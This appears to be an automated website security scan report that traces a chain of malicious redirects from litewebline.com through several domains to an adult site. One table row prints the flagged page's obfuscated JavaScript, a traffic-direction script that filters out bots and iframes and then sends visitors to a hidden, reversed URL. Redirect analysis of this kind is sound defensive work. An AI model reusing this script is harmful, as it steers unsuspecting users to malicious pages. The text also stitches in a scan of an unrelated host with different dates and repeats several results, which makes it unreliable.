Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: subscribepaullina.paullinatimes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 31 Dec 2013 04:18:19 GMT
Server: Apache
Vary: *
Content-Type: text/html
GET / HTTP/1.1
Host: subscribepaullina.paullinatimes.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 31 Dec 2013 04:18:19 GMT
Server: Apache
Vary: *
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: subscribepaullina.paullinatimes.com
Referer: http://www.google.com/search?q=subscribepaullina.paullinatimes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: subscribepaullina.paullinatimes.com
Referer: http://www.google.com/search?q=subscribepaullina.paullinatimes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://litewebline.com/ | 200 OK Content-Length: 60 Content-Type: text/html | clean |
http://litewebline.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 27 Aug 2014 03:54:26 GMT Location: http://processingrealise.com/in.cgi?4¶meter=%3fsearch04.shtml Server: nginx/0.8.54 Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://processingrealise.com/in.cgi?4¶meter=%3fsearch04.shtml | HTTP/1.1 302 Found Connection: close Date: Wed, 27 Aug 2014 03:54:27 GMT Location: http://processingrealise.com/in.cgi?3 Server: nginx/0.8.54 Content-Type: text/html Set-Cookie: SL_4_0000=_1_; domain=processingrealise.com; path=/; expires=Thu, 28-Aug-2014 03:54:27 GMT | clean |
http://processingrealise.com/in.cgi?3 | 200 OK Content-Length: 2367 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var ab_iframe = 0; if( top.frames.length ) ab_iframe = 1; var ab_badtraffic = 0; windowdata=getsize(); if( windowdata[0] < 300 || windowdata[1] < 200 ) ab_badtraffic=1; if( f_clientWidth() < 300 || f_clientHeight() < 200 ) ab_badtraffic=1; window.location=url_de("3?igc.ni/moc.esilaergnissecorp//:ptth")+"&ab_iframe="+ab_iframe+"&ab_badtraffic="+ab_badtraffic+"&antibot_hash=3596520009&ur=1&HTTP_REFERER="; function url_de(s) window.innerHeight ? window.innerHeight : 0, document.documentElement ? document.documentElement.clientHeight : 0, document.body ? document.body.clientHeight : 0 ); } function f_filterResults(n_win, n_docel, n_body) { var n_result = n_win ? n_win : 0; if (n_docel && (!n_result || (n_result > n_docel))) n_result = n_docel; return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result; } Antivirus reports:
| ||
http://processingrealise.com/in.cgi?3&ab_iframe=0&ab_badtraffic=0&ab_trash=1&antibot_hash=bot | HTTP/1.1 302 Found Connection: close Date: Wed, 27 Aug 2014 03:54:27 GMT Location: http://atmovs.com/jump.php?account=13857&design=002&programm=allbills Server: nginx/0.8.54 Content-Type: text/html Set-Cookie: SL_3_0000=_1_; domain=processingrealise.com; path=/; expires=Fri, 29-Aug-2014 03:54:27 GMT | clean |
http://atmovs.com/jump.php?account=13857&design=002&programm=allbills | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 27 Aug 2014 03:54:28 GMT Pragma: no-cache Location: index3.php?account=13857&referer%5B%5D=&agent_id=13857&agent_account=13857&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster Server: cloudflare-nginx Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT CF-RAY: 160553f72f170c95-AMS Set-Cookie: __cfduid=d40a59e9a29ccbdb6f8ec3b3d20c0434f1409111668344; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.atmovs.com; HttpOnly Set-Cookie: PHPSESSID=d6af2n7ggf0nu3s23dm4cr2h65; path=/ Set-Cookie: referer[]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.atmovs.com Set-Cookie: agent_name=webmaster; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: agent_id=13857; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: agent_account=13857; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: programm=allbills; expires=Sat, 22-Aug-2015 03:52:39 GMT; Max-Age=31104000; path=/; domain=.atmovs.com Set-Cookie: p=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.atmovs.com Set-Cookie: ex=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.atmovs.com Set-Cookie: UNIQ_COOKIE_NAME_jump=webmaster%2F13857%2F13857; expires=Thu, 28-Aug-2014 03:52:39 GMT; Max-Age=86400; path=/; domain=.atmovs.com X-Powered-By: PHP/5.5.16-1~dotdeb.1 | clean |
http://atmovs.com/index3.php?account=13857&referer%5b%5d=&agent_id=13857&agent_account=13857&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 81018 Content-Type: text/html | clean |
http://atmovs.com/join_tmwu.php?account=13857&referer%5B0%5D=&agent_id=13857&agent_account=13857&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 19519 Content-Type: text/html | clean |
http://atmovs.com/ | 200 OK Content-Length: 68393 Content-Type: text/html | clean |
http://atmovs.com/join_new.php?account=0&referer%5B%5D=&agent_id=0&agent_account=0&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 20236 Content-Type: text/html | clean |
http://atmovs.com/privacy.html | 200 OK Content-Length: 1171 Content-Type: text/html | clean |
http://atmovs.com/test404page.js | HTTP/1.1 302 Found Cache-Control: public, max-age=14400 Connection: close Date: Wed, 27 Aug 2014 03:54:30 GMT Location: http://teenmegaworld.com Server: cloudflare-nginx Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 27 Aug 2014 07:54:30 GMT CF-Cache-Status: MISS CF-RAY: 16055405af0b0c95-AMS Set-Cookie: __cfduid=d0099b8a24f552327cee0136ab46910291409111670661; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.atmovs.com; HttpOnly | clean |
http://teenmegaworld.com/ | 200 OK Content-Length: 4068 Content-Type: text/html | clean |
http://teenmegaworld.com/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: public, max-age=14400 Connection: close Date: Wed, 27 Aug 2014 03:54:31 GMT Location: http://teenmegaworld.com/index.html Server: cloudflare-nginx Content-Type: text/html Expires: Wed, 27 Aug 2014 07:54:31 GMT CF-Cache-Status: MISS CF-RAY: 160554097de50c05-AMS Set-Cookie: __cfduid=da88003c4b5422555c634f7f095b090681409111671273; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.teenmegaworld.com; HttpOnly | clean |
http://teenmegaworld.com/index.html | 200 OK Content-Length: 4068 Content-Type: text/html | clean |
http://atmovs.com/terms.html | 200 OK Content-Length: 35925 Content-Type: text/html | clean |
http://atmovs.com/index3.php?account=0&referer%5B%5D=&agent_id=0&agent_account=0&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 79866 Content-Type: text/html | clean |
http://atmovs.com/join_tmwu.php?account=0&referer%5B0%5D=&agent_id=0&agent_account=0&programm=allbills&idproduct=30&p=&ex=&agent_name=webmaster | 200 OK Content-Length: 19211 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=litewebline.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://litewebline.com/
Result: litewebline.com is not infected or malware details are not published yet.
Result: litewebline.com is not infected or malware details are not published yet.